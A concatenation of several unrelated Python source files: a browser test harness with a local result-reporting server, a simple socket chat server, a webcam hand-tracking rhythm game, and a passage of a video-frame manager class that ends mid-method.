self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT mactros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_wasm2js = int(os.getenv('EMTEST_BROWSER_ALSO_WASM2JS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
/** @suppress {uselessCode} */
function setupRefTest() {
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
/** @suppress{checkTypes} */
window.requestAnimationFrame = function(func) {
return realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
}
setupRefTest();
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-sIN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper funtions to report result back to server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.c and forice-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.c')]
if EMTEST_BROWSER == 'node':
args.append('-DEMTEST_NODE')
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
assert('reporting' not in kwargs)
assert('expected' not in kwargs)
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_wasm2js=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-sGL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
if EMTEST_BROWSER == 'node':
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
output = self.run_js('test.js')
self.assertContained('RESULT: ' + expected[0], output)
else:
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_wasm2js or self.also_wasm2js):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-sWASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-sGL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
# Useful in debugging sometimes to comment this out, and two lines above
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
|
Server.py
|
from socket import *
from threading import *
clients = set()
nicknames = []
def clientThread(clientSocket, clientAddress,nickname):
while True:
try:
message = clientSocket.recv(1024).decode("utf-8")
# print(clientAddress[0] + ":" + str(clientAddress[1]) +" says: "+ message)
print(f"{nickname} : {message}")
if ":signal number" in message:
print("yes")
for client in clients:
if client is not clientSocket:
client.send((f'{nickname}:'+message).encode("utf-8"))
else:
for client in clients:
if client is not clientSocket:
# client.send((clientAddress[0] + ":" + str(clientAddress[1]) +" says: "+ message).encode("utf-8"))
client.send((f"{nickname} : " + message).encode("utf-8"))
if not message:
clients.remove(clientSocket)
print(clientAddress[0] + ":" + str(clientAddress[1]) +" disconnected")
break
except ConnectionResetError:
pass
clientSocket.close()
hostSocket = socket(AF_INET, SOCK_STREAM)
hostSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR,1)
hostIp = "127.0.0.1"
portNumber = 7500
hostSocket.bind((hostIp, portNumber))
hostSocket.listen()
print ("Waiting for connection...")
if __name__=='__main__':
while True:
clientSocket, clientAddress = hostSocket.accept()
clients.add(clientSocket)
nickname = clientSocket.recv(1024).decode('utf-8')
# print("Nickname",nickname)
# nicknames.append(nickname)
print ("Connection established with: ", clientAddress[0] + ":" + str(clientAddress[1]))
thread = Thread(target=clientThread, args=(clientSocket, clientAddress,nickname ))
thread.start()
|
scene_handler.py
|
from beatmap_reader import *
#from hand_tracking import *
import pyglet
import time
from pyglet.gl import *
import cv2
import numpy as np
from PIL import Image
import mediapipe as mp
import threading
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_hands = mp.solutions.hands
osu_file_name = 'natsumatsuri'
beatmap = read_beatmap(osu_file_name+'.osu')
bgm = pyglet.resource.media(osu_file_name+'.mp3')
hit_sound = pyglet.media.load('hit.wav', streaming=False)
# hit_sound_player = pyglet.media.Player()
# hit_sound_player.queue(hit_sound)
# hit_sound_player.volume = 0.2
osu_w = 640
osu_h = 480
WIDTH = 1280
HEIGHT = 720
RADIUS = 50
T_START = -1500 # Ellapse time of hitpoints
T_PERFECT = 300 # +/-0.3sec for perfect
T_GOOD = 800 # +/-0.8sec for good
T_END = 800
window = pyglet.window.Window(width=WIDTH, height=HEIGHT)
num_batch = pyglet.graphics.Batch()
circle_batch = pyglet.graphics.Batch()
outer_batch = pyglet.graphics.Batch()
cursor_batch1 = pyglet.graphics.Batch()
cursor_batch2 = pyglet.graphics.Batch()
score_batch = pyglet.graphics.Batch()
start_time = time.time()*1000
def hit_judge(ptx, pty, cursorx, cursory):
return (ptx-cursorx)**2+(pty-cursory)**2 < RADIUS**2
score=0
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
hit_label = pyglet.text.Label('',font_name='Arial', font_size=20, bold=True,
x=0, y=0,
anchor_x='center', anchor_y='center', color=(0, 255, 0, 255))
score_background = pyglet.shapes.Rectangle(WIDTH*0.8, HEIGHT*0.9,300,100)
score_background.opacity = 200
curr_i = 0
cursor_left1 = None
cursor_left2 = None
cursor_right1 = None
cursor_right2 = None
for hitpoint in beatmap:
hitpoint['deleted'] = False
def update_circle(dt):
global cursor_left1,cursor_left2, cursor_right1, cursor_right2, score, score_label, hit_label, beatmap, curr_i
t = time.time()*1000 - start_time
cursor_left1 = pyglet.shapes.Circle(left_hand_pos[0], left_hand_pos[1], 15, color=(0,0,255),batch=cursor_batch1)
cursor_left2 = pyglet.shapes.Circle(left_hand_pos[0], left_hand_pos[1], 20, color=(255,255,255),batch=cursor_batch2)
cursor_right1 = pyglet.shapes.Circle(right_hand_pos[0], right_hand_pos[1], 15, color=(255,0,0),batch=cursor_batch1)
cursor_right2 = pyglet.shapes.Circle(right_hand_pos[0], right_hand_pos[1], 20, color=(255,255,255),batch=cursor_batch2)
for hitpoint in beatmap:
gen_time = int(hitpoint['time'])
if hitpoint['deleted']:
continue
if t < gen_time + T_START:
break
elif t > gen_time + T_END:
x, y = int(hitpoint['x'])/osu_w*WIDTH+100, int(hitpoint['y'])/osu_h*HEIGHT+50
hitpoint['inner'].delete()
hitpoint['outer'].delete()
hitpoint['deleted'] = True
# score -= 10
hit_label = pyglet.text.Label('MISS',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(255, 0, 0, 255))
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
continue
else:
x, y = int(hitpoint['x'])/osu_w*WIDTH+100, int(hitpoint['y'])/osu_h*HEIGHT+50
hitpoint['outer'] = pyglet.shapes.Circle(x, y, RADIUS*(1+(gen_time-t)/2000), color=(255, 255, 255), batch=outer_batch)
hitpoint['inner'] = pyglet.shapes.Circle(x, y, RADIUS, color=(255, 102, 170), batch=circle_batch)
if (hit_judge(x, y, left_hand_pos[0], left_hand_pos[1])
or hit_judge(x, y, right_hand_pos[0], right_hand_pos[1])):
hitpoint['inner'].delete()
hitpoint['outer'].delete()
hitpoint['deleted'] = True
hit_sound.play()
if np.abs(gen_time-t) < T_PERFECT:
score += 100
hit_label = pyglet.text.Label('PERFECT',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(0, 255, 0, 255)) # red
elif np.abs(gen_time-t) < T_GOOD:
score += 50
hit_label = pyglet.text.Label('GOOD',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(255, 255, 0, 255)) # yellow
else: # OK
score += 20
hit_label = pyglet.text.Label('OK',
font_name='Arial', font_size=20, bold=True,
x=x, y=y,
anchor_x='center', anchor_y='center', color=(185, 214, 255, 255)) #light blue
score_label = pyglet.text.Label('Score: '+str(score),
font_name='Arial',
font_size=36,
x=WIDTH*0.9, y=HEIGHT*0.95,
anchor_x='center', anchor_y='center', color=(0,0,0,255))
def cv2glet(img):
'''Assumes image is in BGR color space. Returns a pyimg object'''
rows, cols, channels = img.shape
raw_img = Image.fromarray(img).tobytes()
top_to_bottom_flag = -1
bytes_per_row = channels*cols
pyimg = pyglet.image.ImageData(width=cols,
height=rows,
format='BGR',
data=raw_img,
pitch=top_to_bottom_flag*bytes_per_row)
pyimg.scale = 2
return pyimg
cap = cv2.VideoCapture(0)
frame_data = cap.read()
frame_data = frame_data[1]
pyimg = cv2glet(frame_data)
game_running = True
left_hand_pos = [0,0,0]
right_hand_pos = [0,0,0]
def thread_mediapipe():
global frame_data, left_hand_pos, right_hand_pos
cap = cv2.VideoCapture(0)
camera_w = 640*2 # scaled to double
camera_h = 480*2
with mp_hands.Hands(
model_complexity=0,
min_detection_confidence=0.5,
min_tracking_confidence=0.5) as hands:
while game_running:
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
# To improve performance, optionally mark the image as not writeable to
# pass by reference.
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if results.multi_hand_landmarks:
for i in range(len(results.multi_hand_landmarks)):
hand_landmarks = results.multi_hand_landmarks[i]
opposite_handedness = results.multi_handedness[i].classification[0].label # opposite due to flip
### Draw the skeleton detected
# mp_drawing.draw_landmarks(
# image,
# hand_landmarks,
# mp_hands.HAND_CONNECTIONS,
# mp_drawing_styles.get_default_hand_landmarks_style(),
# mp_drawing_styles.get_default_hand_connections_style())
if opposite_handedness == 'Left':
right_hand_pos = [camera_w-hand_landmarks.landmark[12].x*camera_w,
camera_h-hand_landmarks.landmark[12].y*camera_h,
hand_landmarks.landmark[12].z]
else:
left_hand_pos = [camera_w-hand_landmarks.landmark[12].x*camera_w,
camera_h-hand_landmarks.landmark[12].y*camera_h,
hand_landmarks.landmark[12].z]
image = cv2.flip(image, 1)
if cv2.waitKey(5) & 0xFF == 27:
print("exiting")
break
frame_data = image.copy()
cap.release()
def update_camera(dt):
global pyimg
raw_frame = frame_data
frame = cv2.resize(raw_frame, None, fx=2, fy=2)
pyimg = cv2glet(frame)
@window.event()
def on_draw():
window.clear()
pyimg.blit(0,0)
outer_batch.draw()
circle_batch.draw()
num_batch.draw()
cursor_batch2.draw()
cursor_batch1.draw()
score_background.draw()
score_label.draw()
hit_label.draw()
@window.event()
def on_close():
global game_running
game_running = False
print("\n-- Game stopping --\n")
t.join()
pyglet.app.event_loop.exit()
return pyglet.event.EVENT_HANDLED
t = threading.Thread(target = thread_mediapipe, name='mediapipe')
t.start()
bgm.play()
start_time = time.time()*1000
pyglet.clock.schedule_interval(update_camera, 1/60)
pyglet.clock.schedule_interval(update_circle, 1/100)
pyglet.app.run()
|
Management.py
|
# MIT License
# Copyright (c) 2019 Fernando Perez
import numpy as np
import time
import cv2
try:
from PIL import Image
except ModuleNotFoundError as e:
pass
try:
# It is usefull if you want to detect scene changes
import imagehash
except ModuleNotFoundError as e:
pass
try:
# It is usefull if you want to track objects
import dlib
except ModuleNotFoundError as e:
pass
from queue import Queue
from threading import Thread
class ManagerCV2():
""" ManagerCV2 helps to manage videos and streams
With this Class you are capable to iterate a video frame by frame (if you want,
you can also limit the FPS).
Also you can add keystrokes with your own callbacks methods in a easiest way.
At the same time you can ask to this manager the index of the current frame
(self.count_frames) and the FPS processing average.
Finally you can set a method to execute when finishing the iteration.
"""
_tries_reconnect_stream = 10
class KeystrokeManager():
""" KeystrokeManager helps to manage all keystroke during the for of the manager
With this Class ManagerCV2 is capable to manage easily each keystroke.
"""
def __init__(self, **kwargs):
""" KeystrokeManager constructor.
Have in mind that with this class you will never get an error when
you ask for an attribute that doesn't exist.
It will create with the value: False
Thats cool because su can pass no params to this constructor, and
then when you need to chek if a keystroke was pressed (you really
check the param, not the keystroke itself), if it was never pressed
the param doesn't exist, but we take care of it for you :)
Keyword arguments:
Each keyword argument that you pass to the constructor will be
an attribute for this object.
"""
self.__dict__.update(kwargs)
def __getattr__ (self, attr):
""" getattr
Have in mind that this method is called each time that you try to get
an attribute that doesn't exist.
We manage it creating this attribute an giving a value of False.
This is because we want to inform that the asociated with this parameter
wasen't pressed yet.
"""
self.__dict__[attr] = False
return False
def execute_management(self, *args):
""" execute_management
Each time a relevant key is pressed, it will set the associated
param to True. So you can manage it and decide what to do in each
case.
"""
for arg in args:
value = getattr(self, arg)
setattr(self, arg, not value)
def __init__(self, video, is_stream=False, fps_limit=0, queue_size=256, detect_scenes=False, show_video=False):
""" ManagerCV2 constructor.
Arguments:
video -- cv2.VideoCapture that it is going to manage
Keyword arguments:
is_stream -- Bool to indicate if it is an stream or not.
It is not necessary to set it to True if you are using an stream.
It is only for managing streams issuess.
On a stream it is possible to lose frames, so, if you set is_stream
to True, it will try to reconnect the stream as many times as
`ManagerCV2._tries_reconnect_stream` indicates. (Default: False)
fps_limit -- You can set with it the maximum FPS of the video. If you
set it to 0, it means no limit. (Default: 0)
queue_size -- The maximum number of frames to store in the queue (for multiprocessing). (Default: 256)
detect_scenes -- Bool to indicate if you want to detect changes of scenes,
it will have an small impact on the frame rate. Almost 0
if it is a video and you set fps_limit < 60. (Default: False)
show_video -- Bool to indicate if you want to show the video (with cv2.imshow).
If you use the method `add_keystroke` you don't need to use this param
(its fine if you still want to put it to True).
Also, if you doesn't want to show the video, let it a False. (Default: False)
"""
# Video/Stream managment attributes
self.video = video
self.is_stream = is_stream
self.stream = video
self.fps_limit = fps_limit
self.show_video = show_video
self.queue_size = queue_size
self.stream_error = False
self.stopped = False
self.queue = None
self.queue_thread = None
self.awake_thread = None
# Keystrokes attributes
self.key_manager = ManagerCV2.KeystrokeManager()
self.last_keystroke = -1
self.__keystroke_dict = {
# The first three elements will have allways the same length
'keystroke':[],
'wait_key':[],
'keystroke_args':[],
'exit_keystrokes':[],
}
self.ret_handler = None
self.ret_handler_args = ()
self.ret_handler_kwargs = {}
# Additional features
self.initial_time = None
self.final_time = None
self.count_frames = 0
# Scene detection
self.detect_scenes = detect_scenes
self.new_scene = False
self.previous_frame_hash = None
self.hash_distance = 25
# Tracking algorithm
self.selector_tracker = None
self.trackers = []
def __iter__(self):
self.initial_time = time.time()
self.last_frame_time = self.initial_time
self.final_time = self.initial_time
self.count_frames = 0
self.last_keystroke = -1
# All queue management
self.stopped = False
self.queue = Queue(maxsize=self.queue_size)
self.queue_awake = Queue(maxsize=1)
self.queue_thread = Thread(target=self.fill_queue, args=())
self.queue_thread.daemon = True
self.queue_thread.start()
return self
def __next__(self):
# Get frame from queue if not stopped yet
if self.stopped and self.queue.qsize() == 0:
self.end_iteration()
frame, frame_hash = self.queue.get(block=True)
# This is how it comunicates with the thread (to indicate it takes something)
if not self.queue_awake.full():
self.queue_awake.put(None)
# If we get a frame but it is None, it means that we finished the queue
if frame is None:
self.end_iteration()
# If we must detect scenes it will help us
if self.detect_scenes:
if not self.previous_frame_hash:
self.new_scene = True
else:
self.new_scene = (frame_hash - self.previous_frame_hash > self.hash_distance)
self.previous_frame_hash = frame_hash
self.final_time = time.time()
self.count_frames += 1
# If they press one of the keystrokes, it will raise the method
for i, wait_key in enumerate(self.__keystroke_dict['wait_key']):
self.last_keystroke = cv2.waitKey(wait_key)
if self.last_keystroke in self.__keystroke_dict['keystroke']:
index = self.__keystroke_dict['keystroke'].index(self.last_keystroke)
self.key_manager.execute_management(*self.__keystroke_dict['keystroke_args'][index])
if self.last_keystroke in self.__keystroke_dict['exit_keystrokes']:
self.end_iteration()
# If we doesn't add a keystroke we should at least wait a minimum in order to
# be capable to reproduce the video with cv2.imshow (if you indicated that you want
# tho display the video)
# Also, you can wait by yourself (without using Management)
if self.show_video and not self.__keystroke_dict['wait_key']:
cv2.waitKey(1)
# Here we limit the speed (if we want constant frames)
if self.fps_limit:
time_to_sleep = (1 / self.fps_limit) - (time.time() - self.last_frame_time)
if time_to_sleep > 0:
time.sleep(time_to_sleep)
self.last_frame_time = time.time()
return frame
def fill_queue(self):
# keep looping infinitely
while True:
# If the thread indicator variable is set, stop the thread
if self.stopped:
return
if not self.queue.full():
ret, frame = self.video.read()
# In case of streaming it means that we could lose some frames
